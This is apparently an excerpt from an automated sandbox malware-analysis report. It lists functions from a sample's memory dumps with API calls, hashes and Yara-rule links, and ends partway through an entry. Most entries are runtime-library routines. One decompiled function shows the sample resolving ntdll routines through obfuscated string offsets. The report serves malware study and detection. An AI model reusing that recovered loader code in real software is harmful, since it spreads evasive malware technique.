                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3064348918-0
                                                                                                                          • Opcode ID: 219329ec83934d844a4e10cd041c161c37abe5502da9ecd6ddc1726ce2d5363e
                                                                                                                          • Instruction ID: 5edc85e519fb2ee227c22ac5b5fc52e433dd31e59f70bf915644e7c314304105
                                                                                                                          • Opcode Fuzzy Hash: 219329ec83934d844a4e10cd041c161c37abe5502da9ecd6ddc1726ce2d5363e
                                                                                                                          • Instruction Fuzzy Hash: 8A01A17694051EDBCF01DBE4D954AEDF77BAF46318F144809D4116B280EF7499078781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F703C, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7043
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F704D
                                                                                                                          • int.LIBCPMT ref: 6E2F7064
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E2F7087
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F709E
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F70BE
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F70CB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1767075461-0
                                                                                                                          • Opcode ID: 4ab5c2ded09b11ec336ebf857aa2b4863017e941e8dad22cc798fe7235802b27
                                                                                                                          • Instruction ID: a8bfa59aa6fd8d6dc22178aff5a2c5efe45e4f76512d66645d664fb0728cb1ee
                                                                                                                          • Opcode Fuzzy Hash: 4ab5c2ded09b11ec336ebf857aa2b4863017e941e8dad22cc798fe7235802b27
                                                                                                                          • Instruction Fuzzy Hash: 6601AD7A94052ECBCF01DBE8C954AEEF7BBAF41318F250809D411AB2C0DFB09A068791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F70D1, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F70D8
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F70E2
                                                                                                                          • int.LIBCPMT ref: 6E2F70F9
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E2F711C
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7133
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7153
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7160
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1767075461-0
                                                                                                                          • Opcode ID: e10b029a6847a6a9741e0e8324c4ec9e95720e8e4b15f73491d5a286d7a7b27b
                                                                                                                          • Instruction ID: 2045e977f67fcf543bb4025119392979bfef4e631a47c23b50918380a0868e7f
                                                                                                                          • Opcode Fuzzy Hash: e10b029a6847a6a9741e0e8324c4ec9e95720e8e4b15f73491d5a286d7a7b27b
                                                                                                                          • Instruction Fuzzy Hash: AB01AD7A98051EDBCF05DBE4D854AEEBB7BBF41318F140919D4106B3C0DF709A0A8781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7166, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F716D
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7177
                                                                                                                          • int.LIBCPMT ref: 6E2F718E
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F71B1
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F71C8
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F71E8
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F71F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2958136301-0
                                                                                                                          • Opcode ID: 648c8987bea7c7cb035647b4101f8fc82f4583b4844d610237bd14caa7cc5c3e
                                                                                                                          • Instruction ID: 0947fdf29a95a29cea795a3a45b72c2f3d297a1d5a38680d9d8211fd391d6431
                                                                                                                          • Opcode Fuzzy Hash: 648c8987bea7c7cb035647b4101f8fc82f4583b4844d610237bd14caa7cc5c3e
                                                                                                                          • Instruction Fuzzy Hash: 9C01AD7A95051EDBCF01DBE4D954AEEFBBBAF82718F150909D4106B280DF709A0B8B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F71FB, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7202
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F720C
                                                                                                                          • int.LIBCPMT ref: 6E2F7223
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F7246
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F725D
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F727D
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F728A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2958136301-0
                                                                                                                          • Opcode ID: 0de72ef037a7b9925b504ad5cf4c284006501fa2bf917d22b4daf09f1fcf612c
                                                                                                                          • Instruction ID: 7c2238c44bc3b1d6534d72e1aac41ee486082b59864a7eed0508c3d1a081e5bd
                                                                                                                          • Opcode Fuzzy Hash: 0de72ef037a7b9925b504ad5cf4c284006501fa2bf917d22b4daf09f1fcf612c
                                                                                                                          • Instruction Fuzzy Hash: C601AD7A94051ECBCF01DBE8D954AEEF77BBF55328F140909E4116B280EFB09A078791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E343E6F, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 6E343EB7
                                                                                                                          • __fassign.LIBCMT ref: 6E344096
                                                                                                                          • __fassign.LIBCMT ref: 6E3440B3
                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E3440FB
                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E34413B
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E3441E7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4031098158-0
                                                                                                                          • Opcode ID: d1fdb368105d89d3c5cea3fe61950ced31138887487f81bb52601d4c92bbb7dc
                                                                                                                          • Instruction ID: 53b5f2012b41bcbf5df9f914ef8d6de5caeefdc29f25c854ce1944074aced04e
                                                                                                                          • Opcode Fuzzy Hash: d1fdb368105d89d3c5cea3fe61950ced31138887487f81bb52601d4c92bbb7dc
                                                                                                                          • Instruction Fuzzy Hash: D1D188B5D00259DFCF15CFE8D8809EDBBB9BF49304F24416AE855BB242D731AA46CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD1A9C, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 04CD1AF6
                                                                                                                          • SysAllocString.OLEAUT32(0070006F), ref: 04CD1B0A
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 04CD1B1C
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD1B84
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD1B93
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD1B9E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 344208780-0
                                                                                                                          • Opcode ID: a585d89e421fbebb4774f70c72daa0e7ba6c1e155d5f8bc3583d99bc472f781d
                                                                                                                          • Instruction ID: ca09dd64cb4d302b17899ae0367a18cc0bfa26e895b10f25404d0ac41e29964d
                                                                                                                          • Opcode Fuzzy Hash: a585d89e421fbebb4774f70c72daa0e7ba6c1e155d5f8bc3583d99bc472f781d
                                                                                                                          • Instruction Fuzzy Hash: EB415176D00609AFDB01DFB8D844A9FB7BAEF89310F184465EA11EB110DA71EE05CF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD4837, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD4837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04CD75F6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4cdd2e0; // 0xbda5a8
					_t1 = _t23 + 0x4cde11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4cdd2e0; // 0xbda5a8
					_t2 = _t26 + 0x4cde782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04CD4AAB(_t54);
					} else {
						_t30 =  *0x4cdd2e0; // 0xbda5a8
						_t5 = _t30 + 0x4cde76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4cdd2e0; // 0xbda5a8
							_t7 = _t33 + 0x4cde4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4cdd2e0; // 0xbda5a8
								_t9 = _t36 + 0x4cde406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4cdd2e0; // 0xbda5a8
									_t11 = _t39 + 0x4cde792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04CD9269(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                                                                                          0x04cd4846
                                                                                                                          0x04cd484a
                                                                                                                          0x04cd490c
                                                                                                                          0x04cd4850
                                                                                                                          0x04cd4850
                                                                                                                          0x04cd4855
                                                                                                                          0x04cd4868
                                                                                                                          0x04cd486a
                                                                                                                          0x04cd486f
                                                                                                                          0x04cd4877
                                                                                                                          0x04cd487e
                                                                                                                          0x04cd4880
                                                                                                                          0x04cd4885
                                                                                                                          0x04cd4904
                                                                                                                          0x04cd4905
                                                                                                                          0x04cd4887
                                                                                                                          0x04cd4887
                                                                                                                          0x04cd488c
                                                                                                                          0x04cd4894
                                                                                                                          0x04cd4896
                                                                                                                          0x04cd489b
                                                                                                                          0x00000000
                                                                                                                          0x04cd489d
                                                                                                                          0x04cd489d
                                                                                                                          0x04cd48a2
                                                                                                                          0x04cd48aa
                                                                                                                          0x04cd48ac
                                                                                                                          0x04cd48b1
                                                                                                                          0x00000000
                                                                                                                          0x04cd48b3
                                                                                                                          0x04cd48b3
                                                                                                                          0x04cd48b8
                                                                                                                          0x04cd48c0
                                                                                                                          0x04cd48c2
                                                                                                                          0x04cd48c7
                                                                                                                          0x00000000
                                                                                                                          0x04cd48c9
                                                                                                                          0x04cd48c9
                                                                                                                          0x04cd48ce
                                                                                                                          0x04cd48d6
                                                                                                                          0x04cd48d8
                                                                                                                          0x04cd48dd
                                                                                                                          0x00000000
                                                                                                                          0x04cd48df
                                                                                                                          0x04cd48e5
                                                                                                                          0x04cd48ea
                                                                                                                          0x04cd48f1
                                                                                                                          0x04cd48f6
                                                                                                                          0x04cd48fb
                                                                                                                          0x00000000
                                                                                                                          0x04cd48fd
                                                                                                                          0x04cd4900
                                                                                                                          0x04cd4900
                                                                                                                          0x04cd48fb
                                                                                                                          0x04cd48dd
                                                                                                                          0x04cd48c7
                                                                                                                          0x04cd48b1
                                                                                                                          0x04cd489b
                                                                                                                          0x04cd4885
                                                                                                                          0x04cd491a

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04CD101C,?,00000001,?,?,00000000,00000000), ref: 04CD485C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04CD487E
                                                                                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04CD4894
                                                                                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04CD48AA
                                                                                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04CD48C0
                                                                                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04CD48D6
                                                                                                                            • Part of subcall function 04CD9269: memset.NTDLL ref: 04CD92E8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1886625739-0
                                                                                                                          • Opcode ID: 37f50aaeab08cddc98aa9e111fcdcf1d0c51f969487a24551fe0699e2edf927a
                                                                                                                          • Instruction ID: 791aeef685178b4130c00b76b41fd50e0a581b947cbb5220b06a924363356828
                                                                                                                          • Opcode Fuzzy Hash: 37f50aaeab08cddc98aa9e111fcdcf1d0c51f969487a24551fe0699e2edf927a
                                                                                                                          • Instruction Fuzzy Hash: 1A216DB560160AAFEB20DF6AC888E6AB7FCEF043447014026E746DB241E774FE05CB64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1C01, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1C08
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1C12
                                                                                                                          • int.LIBCPMT ref: 6E2F1C29
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1C63
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1C83
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1C90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: da1413f6a893ac32e845b8a21f46742aee31ce831caafa88dde58bad43ed0b7b
                                                                                                                          • Instruction ID: 0d75b17f64ac06641db8b3497d804984624a49afead1c4603efbc1d322d797b5
                                                                                                                          • Opcode Fuzzy Hash: da1413f6a893ac32e845b8a21f46742aee31ce831caafa88dde58bad43ed0b7b
                                                                                                                          • Instruction Fuzzy Hash: 830100BA84012EDBCF01DBE4C954AFEF7BBAF85368F550909D4106B280DF70994ACB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7C75, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7C7C
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7C86
                                                                                                                          • int.LIBCPMT ref: 6E2F7C9D
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7CD7
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7CF7
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7D04
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 080848d69f58dab10b8489b60c508cdc8f8c165192027e693558dd9a462f5674
                                                                                                                          • Instruction ID: cc581544ff86141b4563209b6858e6934785fcd912c1b8d53094611991f7e678
                                                                                                                          • Opcode Fuzzy Hash: 080848d69f58dab10b8489b60c508cdc8f8c165192027e693558dd9a462f5674
                                                                                                                          • Instruction Fuzzy Hash: 9601E17684011EDBCF01DBE4D954AEEB77BAF45318F110809D8116B280DF709A428790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F744F, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7456
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7460
                                                                                                                          • int.LIBCPMT ref: 6E2F7477
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F74B1
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F74D1
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F74DE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 85aaab1e82187447ee7a033bc178877127b7007bc9ef56edc7bbaa9afa07f4e1
                                                                                                                          • Instruction ID: 2b7b8ccc61e030d957775d1b2774614a244b62386557589d4991b7cb6aee6379
                                                                                                                          • Opcode Fuzzy Hash: 85aaab1e82187447ee7a033bc178877127b7007bc9ef56edc7bbaa9afa07f4e1
                                                                                                                          • Instruction Fuzzy Hash: 2C01ED7A98012EDBCF01DBE4C854AEEBB7BBF81728F200819D4106B280DF7099428790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F74E4, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F74EB
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F74F5
                                                                                                                          • int.LIBCPMT ref: 6E2F750C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7546
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7566
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7573
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 1a00421639c339c1aebc265fc0b454cdadba553ffb56c188d0178811a39b217e
                                                                                                                          • Instruction ID: b82f4670d209038b8352715112bb72dd2458a00e8eac5cb0eb66d45ee070ed96
                                                                                                                          • Opcode Fuzzy Hash: 1a00421639c339c1aebc265fc0b454cdadba553ffb56c188d0178811a39b217e
                                                                                                                          • Instruction Fuzzy Hash: 2101AD7A94051EDBCF01DBE4D894AEEB7BBBF46329F140909D8106B290DF709A068B81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7D0A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7D11
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7D1B
                                                                                                                          • int.LIBCPMT ref: 6E2F7D32
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7D6C
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7D8C
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7D99
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 1a79e79dfe4a57cbb0d1d86125635912f662eae84c58c6756ad805b699da4f3b
                                                                                                                          • Instruction ID: 8609645fc1fab9a0ddb29177abadb4d6f17950649ffe4db8eac57ab26e47d6a3
                                                                                                                          • Opcode Fuzzy Hash: 1a79e79dfe4a57cbb0d1d86125635912f662eae84c58c6756ad805b699da4f3b
                                                                                                                          • Instruction Fuzzy Hash: 7E01EDBA85011EDBCF01DBE4CD54AFEB77BAF81718F640A09D4116B280DF7099068780
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7579, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7580
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F758A
                                                                                                                          • int.LIBCPMT ref: 6E2F75A1
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F75DB
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F75FB
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7608
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: ed2e4a6519a31347f5a5f712295cbd9d63dd8059cfef2f9aece4b3186e5369ed
                                                                                                                          • Instruction ID: 4e97293a17dbe48aaab00c060f0bfe5ef904b7b702869bfbab8406ccdcba4710
                                                                                                                          • Opcode Fuzzy Hash: ed2e4a6519a31347f5a5f712295cbd9d63dd8059cfef2f9aece4b3186e5369ed
                                                                                                                          • Instruction Fuzzy Hash: 0D01ED7A98051ECBCF01DBE4C854AEEF77BAF42319F104819D8206B280DF709A028B81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7A21, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
